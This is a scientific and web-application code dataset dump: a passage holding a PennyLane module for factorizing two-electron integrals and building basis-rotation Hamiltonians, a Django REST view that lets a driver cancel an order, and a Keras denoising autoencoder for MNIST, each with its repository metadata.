:math:`V`, in\n `chemist notation `_, is first\n factorized in terms of symmetric matrices :math:`L^{(r)}` such that\n :math:`V_{ijkl} = \\sum_r^R L_{ij}^{(r)} L_{kl}^{(r) T}`. The rank :math:`R` is determined by a\n threshold error. Then, each matrix :math:`L^{(r)}` is diagonalized and its eigenvalues (and\n corresponding eigenvectors) are truncated at a threshold error.\n\n Args:\n two_electron (array[array[float]]): two-electron integral tensor in the molecular orbital\n basis arranged in chemist notation\n tol_factor (float): threshold error value for discarding the negligible factors\n tol_eigval (float): threshold error value for discarding the negligible factor eigenvalues\n\n Returns:\n tuple(array[array[float]], list[array[float]], list[array[float]]): tuple containing\n symmetric matrices (factors) approximating the two-electron integral tensor, truncated\n eigenvalues of the generated factors, and truncated eigenvectors of the generated factors\n\n **Example**\n\n >>> symbols = ['H', 'H']\n >>> geometry = np.array([[0.0, 0.0, 0.0],\n ... 
[1.398397361, 0.0, 0.0]], requires_grad=False)\n >>> mol = qml.qchem.Molecule(symbols, geometry)\n >>> core, one, two = qml.qchem.electron_integrals(mol)()\n >>> two = np.swapaxes(two, 1, 3) # convert to chemist notation\n >>> factors, eigvals, eigvecs = factorize(two, 1e-5, 1e-5)\n >>> print(factors)\n [[[ 1.06723440e-01 9.73575768e-15]\n [ 8.36288956e-15 -1.04898533e-01]]\n [[-2.20945401e-13 -4.25688222e-01]\n [-4.25688222e-01 -2.98228790e-13]]\n [[-8.14472856e-01 5.01669019e-13]\n [ 5.01689072e-13 -8.28642140e-01]]]\n\n .. details::\n :title: Theory\n\n The second quantized electronic Hamiltonian is constructed in terms of fermionic creation,\n :math:`a^{\\dagger}` , and annihilation, :math:`a`, operators as\n [`arXiv:1902.02134 `_]\n\n .. math::\n\n H = \\sum_{\\alpha \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pq} h_{pq} a_{p,\\alpha}^{\\dagger}\n a_{q, \\alpha} + \\frac{1}{2} \\sum_{\\alpha, \\beta \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pqrs}\n h_{pqrs} a_{p, \\alpha}^{\\dagger} a_{q, \\beta}^{\\dagger} a_{r, \\beta} a_{s, \\alpha},\n\n where :math:`h_{pq}` and :math:`h_{pqrs}` are the one- and two-electron integrals computed\n as\n\n .. math::\n\n h_{pq} = \\int \\phi_p(r)^* \\left ( -\\frac{\\nabla_r^2}{2} - \\sum_i \\frac{Z_i}{|r-R_i|} \\right)\n \\phi_q(r) dr,\n\n and\n\n .. math::\n\n h_{pqrs} = \\int \\frac{\\phi_p(r_1)^* \\phi_q(r_2)^* \\phi_r(r_2) \\phi_s(r_1)}{|r_1 - r_2|}\n dr_1 dr_2.\n\n The two-electron integrals can be rearranged in the so-called chemist notation which gives\n\n .. math::\n\n V_{pqrs} = \\int \\frac{\\phi_p(r_1)^* \\phi_q(r_1)^* \\phi_r(r_2) \\phi_s(r_2)}{|r_1 - r_2|}\n dr_1 dr_2,\n\n and the molecular Hamiltonian can be rewritten as\n\n .. math::\n\n H = \\sum_{\\alpha \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pq} T_{pq} a_{p,\\alpha}^{\\dagger}\n a_{q, \\alpha} + \\frac{1}{2} \\sum_{\\alpha, \\beta \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pqrs}\n V_{pqrs} a_{p, \\alpha}^{\\dagger} a_{q, \\alpha} a_{r, \\beta}^{\\dagger} a_{s, \\beta},\n\n with\n\n .. math::\n\n T_{pq} = h_{pq} - \\frac{1}{2} \\sum_s h_{pssq}.\n\n\n This notation allows a low-rank factorization of the two-electron integral. The objective of\n the factorization is to find a set of symmetric matrices, :math:`L^{(r)}`, such that\n\n .. math::\n\n V_{ijkl} = \\sum_r^R L_{ij}^{(r)} L_{kl}^{(r) T},\n\n with the rank :math:`R \\leq n^2` where :math:`n` is the number of molecular orbitals. 
The\n matrices :math:`L^{(r)}` are diagonalized and for each matrix the eigenvalues that are\n smaller than a given threshold (and their corresponding eigenvectors) are discarded.\n\n The factorization algorithm has the following steps\n [`arXiv:1902.02134 `_]:\n\n - Reshape the :math:`n \\times n \\times n \\times n` two-electron tensor to a\n :math:`n^2 \\times n^2` matrix where :math:`n` is the number of orbitals.\n\n - Diagonalize the resulting matrix and keep the :math:`r` eigenvectors that have\n corresponding eigenvalues larger than a threshold.\n\n - Multiply the eigenvectors by the square root of the eigenvalues to obtain\n matrices :math:`L^{(r)}`.\n\n - Reshape the selected eigenvectors to :math:`n \\times n` matrices.\n\n - Diagonalize the :math:`n \\times n` matrices and for each matrix keep the eigenvalues (and\n their corresponding eigenvectors) that are larger than a threshold.\n \"\"\"\n shape = two_electron.shape\n\n if len(shape) != 4 or len(set(shape)) != 1:\n raise ValueError(\"The two-electron repulsion tensor must have a (N x N x N x N) shape.\")\n\n n = shape[0]\n two = two_electron.reshape(n * n, n * n)\n\n eigvals_r, eigvecs_r = np.linalg.eigh(two)\n eigvals_r = np.array([val for val in eigvals_r if abs(val) > tol_factor])\n\n eigvecs_r = eigvecs_r[:, -len(eigvals_r) :]\n\n if eigvals_r.size == 0:\n raise ValueError(\n \"All factors are discarded. Consider decreasing the first threshold error.\"\n )\n\n vectors = eigvecs_r @ np.diag(np.sqrt(eigvals_r))\n\n r = len(eigvals_r)\n factors = np.array([vectors.reshape(n, n, r)[:, :, k] for k in range(r)])\n\n eigvals, eigvecs = np.linalg.eigh(factors)\n eigvals_m = []\n eigvecs_m = []\n for n, eigval in enumerate(eigvals):\n idx = [i for i, v in enumerate(eigval) if abs(v) > tol_eigval]\n eigvals_m.append(eigval[idx])\n eigvecs_m.append(eigvecs[n][idx])\n\n if np.sum([len(v) for v in eigvecs_m]) == 0:\n raise ValueError(\n \"All eigenvectors are discarded. Consider decreasing the second threshold error.\"\n )\n\n return factors, eigvals_m, eigvecs_m\n\n\ndef basis_rotation(one_electron, two_electron, tol_factor=1.0e-5):\n r\"\"\"Return the grouped coefficients and observables of a molecular Hamiltonian and the basis\n rotation unitaries obtained with the basis rotation grouping method.\n\n Args:\n one_electron (array[float]): one-electron integral matrix in the molecular orbital basis\n two_electron (array[array[float]]): two-electron integral tensor in the molecular orbital\n basis arranged in chemist notation\n tol_factor (float): threshold error value for discarding the negligible factors\n\n Returns:\n tuple(list[array[float]], list[list[Observable]], list[array[float]]): tuple containing\n grouped coefficients, grouped observables and basis rotation transformation matrices\n\n **Example**\n\n >>> symbols = ['H', 'H']\n >>> geometry = np.array([[0.0, 0.0, 0.0],\n ... 
[1.398397361, 0.0, 0.0]], requires_grad=False)\n >>> mol = qml.qchem.Molecule(symbols, geometry)\n >>> core, one, two = qml.qchem.electron_integrals(mol)()\n >>> coeffs, ops, unitaries = basis_rotation(one, two, tol_factor=1.0e-5)\n >>> print(coeffs)\n [array([ 0.84064649, -2.59579282, 0.84064649, 0.45724992, 0.45724992]),\n array([ 9.57150297e-05, 5.60006390e-03, 9.57150297e-05, 2.75092558e-03,\n -9.73801723e-05, -2.79878310e-03, -9.73801723e-05, -2.79878310e-03,\n -2.79878310e-03, -2.79878310e-03, 2.84747318e-03]),\n array([ 0.04530262, -0.04530262, -0.04530262, -0.04530262, -0.04530262,\n 0.09060523, 0.04530262]),\n array([-0.66913628, 1.6874169 , -0.66913628, 0.16584151, -0.68077716,\n 0.16872663, -0.68077716, 0.16872663, 0.16872663, 0.16872663,\n 0.17166195])]\n\n .. details::\n :title: Theory\n\n A second-quantized molecular Hamiltonian can be constructed in the\n `chemist notation `_ format\n following Eq. (1) of\n [`PRX Quantum 2, 030305, 2021 `_]\n as\n\n .. math::\n\n H = \\sum_{\\alpha \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pq} T_{pq} a_{p,\\alpha}^{\\dagger}\n a_{q, \\alpha} + \\frac{1}{2} \\sum_{\\alpha, \\beta \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pqrs}\n V_{pqrs} a_{p, \\alpha}^{\\dagger} a_{q, \\alpha} a_{r, \\beta}^{\\dagger} a_{s, \\beta},\n\n where :math:`V_{pqrs}` denotes a two-electron integral in the chemist notation and\n :math:`T_{pq}` is obtained from the one- and two-electron integrals, :math:`h_{pq}` and\n :math:`h_{pqrs}`, as\n\n .. math::\n\n T_{pq} = h_{pq} - \\frac{1}{2} \\sum_s h_{pssq}.\n\n The tensor :math:`V` can be converted to a matrix which is indexed by the indices :math:`pq`\n and :math:`rs` and eigendecomposed up to a rank :math:`R` to give\n\n .. math::\n\n V_{pqrs} = \\sum_r^R L_{pq}^{(r)} L_{rs}^{(r) T},\n\n where :math:`L` denotes the matrix of eigenvectors of the matrix :math:`V`. The molecular\n Hamiltonian can then be rewritten following Eq. (7) of\n [`Phys. Rev. Research 3, 033055, 2021 `_]\n as\n\n .. math::\n\n H = \\sum_{\\alpha \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pq} T_{pq} a_{p,\\alpha}^{\\dagger}\n a_{q, \\alpha} + \\frac{1}{2} \\sum_r^R \\left ( \\sum_{\\alpha \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pq}\n L_{pq}^{(r)} a_{p, \\alpha}^{\\dagger} a_{q, \\alpha} \\right )^2.\n\n The orbital basis can be rotated such that each :math:`T` and :math:`L^{(r)}` matrix is\n diagonal. The Hamiltonian can then be written following Eq. (2) of\n [`npj Quantum Information, 7, 23 (2021) `_]\n as\n\n .. math::\n\n H = U_0 \\left ( \\sum_p d_p n_p \\right ) U_0^{\\dagger} + \\sum_r^R U_r \\left ( \\sum_{pq}\n d_{pq}^{(r)} n_p n_q \\right ) U_r^{\\dagger},\n\n where the coefficients :math:`d` are obtained by diagonalizing the :math:`T` and\n :math:`L^{(r)}` matrices. The number operators :math:`n_p = a_p^{\\dagger} a_p` can be\n converted to qubit operators using\n\n .. math::\n\n n_p = \\frac{1-Z_p}{2},\n\n where :math:`Z_p` is the Pauli :math:`Z` operator applied to qubit :math:`p`. This gives\n the qubit Hamiltonian\n\n .. math::\n\n H = U_0 \\left ( \\sum_p O_p^{(0)} \\right ) U_0^{\\dagger} + \\sum_r^R U_r \\left ( \\sum_{q} O_q^{(r)} \\right ) U_r^{\\dagger},\n\n where :math:`O = \\sum_i c_i P_i` is a linear combination of Pauli words :math:`P_i` that are\n a tensor product of Pauli :math:`Z` and Identity operators. This allows all the Pauli words\n in each of the :math:`O` terms to be measured simultaneously. 
This function returns the\n coefficients and the Pauli words grouped for each of the :math:`O` terms as well as the\n basis rotation transformation matrices that are constructed from the eigenvectors of the\n :math:`T` and :math:`L^{(r)}` matrices. Each column of the transformation matrix is an\n eigenvector of the corresponding :math:`T` or :math:`L^{(r)}` matrix.\n \"\"\"\n\n num_orbitals = one_electron.shape[0] * 2\n one_body_tensor, chemist_two_body_tensor = _chemist_transform(one_electron, two_electron)\n chemist_one_body_tensor = np.kron(one_body_tensor, np.eye(2)) # account for spin\n t_eigvals, t_eigvecs = np.linalg.eigh(chemist_one_body_tensor)\n\n factors, _, _ = factorize(chemist_two_body_tensor, tol_factor=tol_factor)\n factors = [np.kron(factor, np.eye(2)) for factor in factors] # account for spin\n\n v_coeffs, v_unitaries = np.linalg.eigh(factors)\n indices = [np.argsort(v_coeff)[::-1] for v_coeff in v_coeffs]\n v_coeffs = [v_coeff[indices[idx]] for idx, v_coeff in enumerate(v_coeffs)]\n v_unitaries = [v_unitary[:, indices[idx]] for idx, v_unitary in enumerate(v_unitaries)]\n\n ops_t = 0.0\n for p in range(num_orbitals):\n ops_t += 0.5 * t_eigvals[p] * (qml.Identity(p) - qml.PauliZ(p))\n\n ops_l = []\n for idx in range(len(factors)):\n ops_l_ = 0.0\n for p in range(num_orbitals):\n for q in range(num_orbitals):\n ops_l_ += (\n v_coeffs[idx][p]\n * v_coeffs[idx][q]\n * 0.25\n * (\n qml.Identity(p)\n - qml.PauliZ(p)\n - qml.PauliZ(q)\n + qml.pauli.pauli_mult_with_phase(qml.PauliZ(p), qml.PauliZ(q))[0]\n )\n )\n ops_l.append(ops_l_)\n\n ops = [ops_t] + ops_l\n c_group = [op.coeffs for op in ops]\n o_group = [op.ops for op in ops]\n u_transform = list([t_eigvecs] + list(v_unitaries)) # Inverse of diagonalizing unitaries\n\n return c_group, o_group, u_transform\n\n\ndef _chemist_transform(one_body_tensor=None, two_body_tensor=None, spatial_basis=True):\n r\"\"\"Transforms one- and two-body terms in physicists' notation to `chemists' notation `_\\ .\n\n This converts the input two-body tensor :math:`h_{pqrs}` that constructs :math:`\\sum_{pqrs} h_{pqrs} a^\\dagger_p a^\\dagger_q a_r a_s`\n to a transformed two-body tensor :math:`V_{pqrs}` that follows the chemists' convention to construct :math:`\\sum_{pqrs} V_{pqrs} a^\\dagger_p a_q a^\\dagger_r a_s`\n in the spatial basis. During the tranformation, some extra one-body terms come out. These are returned as a one-body tensor :math:`T_{pq}` in the\n chemists' notation either as is or after summation with the input one-body tensor :math:`h_{pq}`, if provided.\n\n Args:\n one_body_tensor (array[float]): a one-electron integral tensor giving the :math:`h_{pq}`.\n two_body_tensor (array[float]): a two-electron integral tensor giving the :math:`h_{pqrs}`.\n spatial_basis (bool): True if the integral tensor are passed in spatial-orbital basis. False if they are in spin basis.\n\n Returns:\n tuple(array[float], array[float]) or tuple(array[float],): transformed one-body tensor :math:`T_{pq}` and two-body tensor :math:`V_{pqrs}` for the provided terms.\n\n **Example**\n\n >>> symbols = ['H', 'H']\n >>> geometry = np.array([[0.0, 0.0, 0.0],\n ... [1.398397361, 0.0, 0.0]], requires_grad=False)\n >>> mol = qml.qchem.Molecule(symbols, geometry)\n >>> core, one, two = qml.qchem.electron_integrals(mol)()\n >>> qml.qchem.factorization._chemist_transform(two_body_tensor=two, spatial_basis=True)\n (tensor([[-0.427983, -0. ],\n [-0. , -0.439431]], requires_grad=True),\n tensor([[[[0.337378, 0. ],\n [0. , 0.331856]],\n [[0. 
, 0.090605],\n [0.090605 , 0. ]]],\n [[[0. , 0.090605],\n [0.090605 , 0. ]],\n [[0.331856, 0. ],\n [0. , 0.348826]]]], requires_grad=True))\n\n .. details::\n :title: Theory\n\n The two-electron integral in physicists' notation is defined as:\n\n .. math::\n\n \\langle pq \\vert rs \\rangle = h_{pqrs} = \\int \\frac{\\chi^*_{p}(x_1) \\chi^*_{q}(x_2) \\chi_{r}(x_1) \\chi_{s}(x_2)}{|r_1 - r_2|} dx_1 dx_2,\n\n while in chemists' notation it is written as:\n\n .. math::\n\n [pq \\vert rs] = V_{pqrs} = \\int \\frac{\\chi^*_{p}(x_1) \\chi_{q}(x_1) \\chi^*_{r}(x_2) \\chi_{s}(x_2)}{|r_1 - r_2|} dx_1 dx_2.\n\n In the spin basis, this index reordering :math:`pqrs \\rightarrow psrq` leads to formation of one-body terms :math:`h_{prrs}` that come out during\n the coversion:\n\n .. math::\n\n h_{prrs} = \\int \\frac{\\chi^*_{p}(x_1) \\chi^*_{r}(x_2) \\chi_{r}(x_1) \\chi_{s}(x_2)}{|x_1 - x_2|} dx_1 dx_2,\n\n where both :math:`\\chi_{r}(x_1)` and :math:`\\chi_{r}(x_2)` will have same spin functions, i.e.,\n :math:`\\chi_{r}(x_i) = \\phi(r_i)\\alpha(\\omega)` or :math:`\\chi_{r}(x_i) = \\phi(r_i)\\beta(\\omega)`\\ . These are added to the one-electron\n integral tensor :math:`h_{pq}` to compute :math:`T_{pq}`\\ .\n\n \"\"\"\n\n chemist_two_body_coeffs, chemist_one_body_coeffs = None, None\n\n if one_body_tensor is not None:\n chemist_one_body_coeffs = one_body_tensor.copy()\n\n if two_body_tensor is not None:\n chemist_two_body_coeffs = np.swapaxes(two_body_tensor, 1, 3)\n one_body_coeffs = -np.einsum(\"prrs\", chemist_two_body_coeffs)\n\n if chemist_one_body_coeffs is None:\n chemist_one_body_coeffs = np.zeros_like(one_body_coeffs)\n\n if spatial_basis:\n chemist_two_body_coeffs = 0.5 * chemist_two_body_coeffs\n one_body_coeffs = 0.5 * one_body_coeffs\n\n chemist_one_body_coeffs += one_body_coeffs\n\n return (x for x in [chemist_one_body_coeffs, chemist_two_body_coeffs] if x is not None)\n", "repo_name": "PennyLaneAI/pennylane", "sub_path": "pennylane/qchem/factorization.py", "file_name": "factorization.py", "file_ext": "py", "file_size_in_byte": 17404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1965, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pennylane.numpy.linalg.eigh", "line_number": 129, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pennylane.numpy", "line_number": 129, "usage_type": "name"}, {"api_name": "pennylane.numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 130, "usage_type": "name"}, {"api_name": "pennylane.numpy.diag", "line_number": 139, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 139, "usage_type": "name"}, {"api_name": "pennylane.numpy.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "pennylane.numpy.array", "line_number": 142, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 142, "usage_type": "name"}, {"api_name": "pennylane.numpy.linalg.eigh", "line_number": 144, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg", "line_number": 144, "usage_type": "attribute"}, {"api_name": "pennylane.numpy", "line_number": 144, "usage_type": "name"}, {"api_name": "pennylane.numpy.sum", "line_number": 152, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 152, "usage_type": "name"}, {"api_name": "pennylane.numpy.kron", "line_number": 270, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 270, "usage_type": "name"}, 
{"api_name": "pennylane.numpy.eye", "line_number": 270, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg.eigh", "line_number": 271, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pennylane.numpy", "line_number": 271, "usage_type": "name"}, {"api_name": "pennylane.numpy.kron", "line_number": 274, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 274, "usage_type": "name"}, {"api_name": "pennylane.numpy.eye", "line_number": 274, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg.eigh", "line_number": 276, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg", "line_number": 276, "usage_type": "attribute"}, {"api_name": "pennylane.numpy", "line_number": 276, "usage_type": "name"}, {"api_name": "pennylane.numpy.argsort", "line_number": 277, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 277, "usage_type": "name"}, {"api_name": "pennylane.Identity", "line_number": 283, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 283, "usage_type": "call"}, {"api_name": "pennylane.Identity", "line_number": 295, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 296, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 297, "usage_type": "call"}, {"api_name": "pennylane.pauli.pauli_mult_with_phase", "line_number": 298, "usage_type": "call"}, {"api_name": "pennylane.pauli", "line_number": 298, "usage_type": "attribute"}, {"api_name": "pennylane.PauliZ", "line_number": 298, "usage_type": "call"}, {"api_name": "pennylane.numpy.swapaxes", "line_number": 380, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 380, "usage_type": "name"}, {"api_name": "pennylane.numpy.einsum", "line_number": 381, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 381, "usage_type": "name"}, {"api_name": "pennylane.numpy.zeros_like", "line_number": 384, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 384, "usage_type": "name"}]} +{"seq_id": "70144643366", "text": "from django.utils.translation import gettext_lazy as _\nfrom rest_framework import generics, status\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\n\nfrom apps.order.api_endpoints.Cancel.serializers import DriverOrderCancelSerializer\nfrom apps.order.models import Order, Trip\nfrom helpers.permissions import CustomDriverPermission\n\n\nclass OrderCancelView(generics.GenericAPIView):\n serializer_class = DriverOrderCancelSerializer\n permission_classes = CustomDriverPermission\n\n def get_queryset(self):\n trip, _ = Trip.objects.get_or_create(status=Trip.TripStatus.ACTIVE, driver=self.request.user.driver)\n return trip\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n order = serializer.validated_data[\"order\"]\n trip = self.get_queryset()\n\n if order.type == Order.OrderType.PERSON:\n if trip.client.filter(id=order.id).exists():\n trip.client.remove(order) # removing from driver's trip\n order.canceled_by_driver() # returning to the requested state\n return Response({\"message\": _(\"Successfully removed\")}, status=status.HTTP_200_OK)\n else:\n raise ValidationError(detail={\"order\": _(\"Order does not exist on your trip\")}, code=\"not_found\")\n\n else:\n if trip.delivery.filter(id=order.id).exists():\n trip.delivery.remove(order)\n 
order.canceled_by_driver()\n return Response({\"message\": _(\"Successfully removed\")}, status=status.HTTP_200_OK)\n else:\n raise ValidationError(detail={\"order\": _(\"Order does not exist on your trip\")}, code=\"not_found\")\n\n\n__all__ = [\"OrderCancelView\"]\n", "repo_name": "khodjiyev2o/tranzit.uz", "sub_path": "apps/order/api_endpoints/Cancel/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.generics.GenericAPIView", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 11, "usage_type": "name"}, {"api_name": "apps.order.api_endpoints.Cancel.serializers.DriverOrderCancelSerializer", "line_number": 12, "usage_type": "name"}, {"api_name": "helpers.permissions.CustomDriverPermission", "line_number": 13, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 16, "usage_type": "name"}, {"api_name": "apps.order.models.Trip.objects.get_or_create", "line_number": 16, "usage_type": "call"}, {"api_name": "apps.order.models.Trip.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "apps.order.models.Trip", "line_number": 16, "usage_type": "name"}, {"api_name": "apps.order.models.Trip.TripStatus", "line_number": 16, "usage_type": "attribute"}, {"api_name": "apps.order.models.Order.OrderType", "line_number": 25, "usage_type": "attribute"}, {"api_name": "apps.order.models.Order", "line_number": 25, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 29, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 29, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 29, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 31, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 37, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 37, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 37, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 39, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "28337133788", "text": "'''Trains a denoising autoencoder on MNIST dataset.\n\nDenoising is one of the classic applications of autoencoders.\nThe denoising process removes unwanted noise that corrupted the\ntrue data.\n\nNoise + Data ---> Denoising Autoencoder ---> Data\n\nGiven a training dataset of corrupted data as input and\ntrue data as output, a denoising autoencoder can recover the\nhidden structure to generate clean data.\n\nThis example has modular design. The encoder, decoder and autoencoder\nare 3 models that share weights. 
For example, after training the\nautoencoder, the encoder can be used to generate latent vectors\nof input data for low-dim visualization like PCA or TSNE.\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.keras.layers import Dense, Input\nfrom tensorflow.keras.layers import Conv2D, Flatten\nfrom tensorflow.keras.layers import Reshape, Conv2DTranspose\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.datasets import mnist\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nnp.random.seed(1337)\n\n# load MNIST dataset\n(x_train, _), (x_test, _) = mnist.load_data()\n\n# reshape to (28, 28, 1) and normalize input images\nimage_size = x_train.shape[1]\nx_train = np.reshape(x_train, [-1, image_size, image_size, 1])\nx_test = np.reshape(x_test, [-1, image_size, image_size, 1])\nx_train = x_train.astype('float32') / 255\nx_test = x_test.astype('float32') / 255\n\n# generate corrupted MNIST images by adding noise with normal dist\n# centered at 0.5 and std=0.5\nnoise = np.random.normal(loc=0.5, scale=0.5, size=x_train.shape)\nx_train_noisy = x_train + noise\nnoise = np.random.normal(loc=0.5, scale=0.5, size=x_test.shape)\nx_test_noisy = x_test + noise\n\n# adding noise may exceed normalized pixel values>1.0 or <0.0\n# clip pixel values >1.0 to 1.0 and <0.0 to 0.0\nx_train_noisy = np.clip(x_train_noisy, 0., 1.)\nx_test_noisy = np.clip(x_test_noisy, 0., 1.)\n\n# network parameters\ninput_shape = (image_size, image_size, 1)\nbatch_size = 32\nkernel_size = 3\nlatent_dim = 16\n# encoder/decoder number of CNN layers and filters per layer\nlayer_filters = [32, 64]\n\n# build the autoencoder model\n# first build the encoder model\ninputs = Input(shape=input_shape, name='encoder_input')\nx = inputs\n\n# stack of Conv2D(32)-Conv2D(64)\nfor filters in layer_filters:\n x = Conv2D(filters=filters,\n kernel_size=kernel_size,\n strides=2,\n activation='relu',\n padding='same')(x)\n\n# shape info needed to build decoder model so we don't do hand computation\n# the input to the decoder's first Conv2DTranspose will have this shape\n# shape is (7, 7, 64) which can be processed by the decoder back to (28, 28, 1)\nshape = K.int_shape(x)\n\n# generate the latent vector\nx = Flatten()(x)\nlatent = Dense(latent_dim, name='latent_vector')(x)\n\n# instantiate encoder model\nencoder = Model(inputs, latent, name='encoder')\nencoder.summary()\n\n# build the decoder model\nlatent_inputs = Input(shape=(latent_dim,), name='decoder_input')\n# use the shape (7, 7, 64) that was earlier saved\nx = Dense(shape[1] * shape[2] * shape[3])(latent_inputs)\n# from vector to suitable shape for transposed conv\nx = Reshape((shape[1], shape[2], shape[3]))(x)\n\n# stack of Conv2DTranspose(64)-Conv2DTranspose(32)\nfor filters in layer_filters[::-1]:\n x = Conv2DTranspose(filters=filters,\n kernel_size=kernel_size,\n strides=2,\n activation='relu',\n padding='same')(x)\n\n# reconstruct the denoised input\noutputs = Conv2DTranspose(filters=1,\n kernel_size=kernel_size,\n padding='same',\n activation='sigmoid',\n name='decoder_output')(x)\n\n# instantiate decoder model\ndecoder = Model(latent_inputs, outputs, name='decoder')\ndecoder.summary()\n\n# autoencoder = encoder + decoder\n# instantiate autoencoder model\nautoencoder = Model(inputs, decoder(encoder(inputs)), name='autoencoder')\nautoencoder.summary()\n\n# Mean Square Error (MSE) loss function, Adam 
optimizer\nautoencoder.compile(loss='mse', optimizer='adam')\n\n# train the autoencoder\nautoencoder.fit(x_train_noisy,\n x_train,\n validation_data=(x_test_noisy, x_test),\n epochs=10,\n batch_size=batch_size)\n\n# predict the autoencoder output from corrupted test images\nx_decoded = autoencoder.predict(x_test_noisy)\n\n# 3 sets of images with 9 MNIST digits\n# 1st rows - original images\n# 2nd rows - images corrupted by noise\n# 3rd rows - denoised images\nrows, cols = 3, 9\nnum = rows * cols\nimgs = np.concatenate([x_test[:num], x_test_noisy[:num], x_decoded[:num]])\nimgs = imgs.reshape((rows * 3, cols, image_size, image_size))\nimgs = np.vstack(np.split(imgs, rows, axis=1))\nimgs = imgs.reshape((rows * 3, -1, image_size, image_size))\nimgs = np.vstack([np.hstack(i) for i in imgs])\nimgs = (imgs * 255).astype(np.uint8)\nplt.figure()\nplt.axis('off')\nplt.title('Original images: top rows, '\n 'Corrupted Input: middle rows, '\n 'Denoised Input: third rows')\nplt.imshow(imgs, interpolation='none', cmap='gray')\nImage.fromarray(imgs).save('corrupted_and_denoised.png')\nplt.show()\n", "repo_name": "PacktPublishing/Advanced-Deep-Learning-with-Keras", "sub_path": "chapter3-autoencoders/denoising-autoencoder-mnist-3.3.1.py", "file_name": "denoising-autoencoder-mnist-3.3.1.py", "file_ext": "py", "file_size_in_byte": 5329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1645, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.seed", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.datasets.mnist.load_data", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets.mnist", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.int_shape", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 81, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 85, "usage_type": "call"}, 